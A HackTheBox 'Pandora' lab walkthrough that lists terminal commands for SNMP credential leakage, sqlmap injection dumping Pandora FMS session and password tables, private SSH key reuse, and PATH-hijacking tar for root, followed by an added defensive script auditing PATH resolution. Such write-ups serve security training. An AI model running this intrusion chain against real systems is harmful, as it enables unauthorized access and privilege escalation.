
HackTheBox – Pandora Walkthrough – In English

┌──(root㉿kali)-[/home/kali/Downloads]

└─# nmap -sV -sC 10.10.11.136

http://10.10.11.136/

┌──(root㉿kali)-[/home/kali/Downloads]

└─# nmap -sU --top-ports=20 panda.htb

┌──(root㉿kali)-[/home/kali/Downloads]

└─# snmpwalk -v 1 -c public panda.htb > snmpwalk-1.txt

┌──(root㉿kali)-[/home/kali/Downloads]

└─# cat snmpwalk-1.txt

We get

Username: daniel

Password: HotelBabylon23

┌──(root㉿kali)-[/home/kali/Downloads]

└─# ssh daniel@10.10.11.136

As you can see, while I was going through the information I found a cleartext username and password, so I used those to log into the machine via SSH.

The user flag is in another user’s directory, so I need to pivot to that user. The two primary targets I had were /var/www/html and /var/www/pandora. The html side was visible to the public, but the pandora directory was new. Inside the /etc/hosts file we see an unusual hostname assignment, so I decided to use this as a lead.

If we assume that this hostname serves the pandora directory, then we need to set up a dynamic tunnel. You can do this with the following command: ssh -D 9090 daniel@panda.htb. Using this tunnel, we can set up a proxy to view the webpage.

┌──(root㉿kali)-[/home/kali/Downloads]

└─# ssh -D 9090 daniel@panda.htb

http://localhost.localdomain/pandora_console/

┌──(root㉿kali)-[/home/kali/Downloads]

└─# cat /etc/proxychains4.conf

┌──(root㉿kali)-[/home/kali/Downloads]

└─# proxychains sqlmap --url="http://localhost.localdomain/pandora_console/include/chart_generator.php?session_id=''" -D pandora --tables

┌──(root㉿kali)-[/home/kali/Downloads]

└─# proxychains sqlmap --url="http://localhost.localdomain/pandora_console/include/chart_generator.php?session_id=''" -T tpassword_history --dump

┌──(root㉿kali)-[/home/kali/Downloads]

└─# proxychains sqlmap --url="http://localhost.localdomain/pandora_console/include/chart_generator.php?session_id=''" -T tsessions_php --dump

http://localhost.localdomain/pandora_console/index.php?session_id=g4e01qdgk36mfdh90hvcc54umq

https://github.com/shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated/blob/master/sqlpwn.py

We now log in as admin.

http://localhost.localdomain/pandora_console/images/

$ python3 -c 'import pty;pty.spawn("/bin/bash")'

matt@pandora:/home/matt$ cd .ssh

matt@pandora:/home/matt/.ssh$ cat id_rsa.pub > authorized_keys

matt@pandora:/home/matt/.ssh$ chmod 700 authorized_keys

matt@pandora:/home/matt/.ssh$ cat id_rsa

┌──(root㉿kali)-[/home/kali/Downloads]

└─# ssh matt@10.10.11.136 -i id_rsa

matt@pandora:~$ cd /home/matt/

matt@pandora:~$ echo "/bin/bash" > tar

matt@pandora:~$ chmod +x tar

matt@pandora:~$ export PATH=/home/matt:$PATH

matt@pandora:~$ /usr/bin/pandora_backup

root@pandora:~# cat /root/root.txt
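
The last step works only if pandora_backup runs tar by bare name using the caller's PATH, which is what the commands above imply. The script below is an added example, not part of the original walkthrough: it reports which file a bare command name resolves to under a given PATH and flags any match outside the system binary directories. TRUSTED_DIRS and the function names are assumptions chosen for illustration.

```sh
#!/bin/sh
# Added example (not from the walkthrough): audit bare-name command resolution.
# Assumption: TRUSTED_DIRS lists the root-owned binary directories on this host.
TRUSTED_DIRS="/usr/local/sbin /usr/local/bin /usr/sbin /usr/bin /sbin /bin"

# resolve_in_path CMD PATHVALUE: print the first executable match, in PATH order.
resolve_in_path() {
    cmd=$1
    old_ifs=$IFS
    IFS=:
    for dir in $2; do
        if [ -z "$dir" ]; then dir=.; fi   # an empty PATH entry means the cwd
        if [ -f "$dir/$cmd" ] && [ -x "$dir/$cmd" ]; then
            IFS=$old_ifs
            printf '%s\n' "$dir/$cmd"
            return 0
        fi
    done
    IFS=$old_ifs
    return 1
}

# is_trusted FILE: succeed if FILE sits directly in one of TRUSTED_DIRS.
is_trusted() {
    for trusted in $TRUSTED_DIRS; do
        if [ "${1%/*}" = "$trusted" ]; then return 0; fi
    done
    return 1
}

# audit_command CMD PATHVALUE: print a verdict; return 0 only when resolution is safe.
audit_command() {
    if ! hit=$(resolve_in_path "$1" "$2"); then
        echo "MISSING $1"; return 2
    fi
    if is_trusted "$hit"; then
        echo "OK $hit"; return 0
    fi
    echo "HIJACKABLE $hit"; return 1
}

# Constructed demo: a harmless stand-in named "tar" in a scratch directory.
demo=$(mktemp -d)
printf '#!/bin/sh\necho stand-in\n' > "$demo/tar"
chmod +x "$demo/tar"
audit_command tar "$demo:/usr/bin:/bin" || true   # writable dir first: flagged
audit_command tar "/usr/bin:/bin" || true         # system dirs only
rm -rf "$demo"
```

For a privileged program the fix belongs in the program itself: call helpers such as tar by absolute path, or reset PATH to root-owned directories before running them.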

Hi, I’m saksham dixit
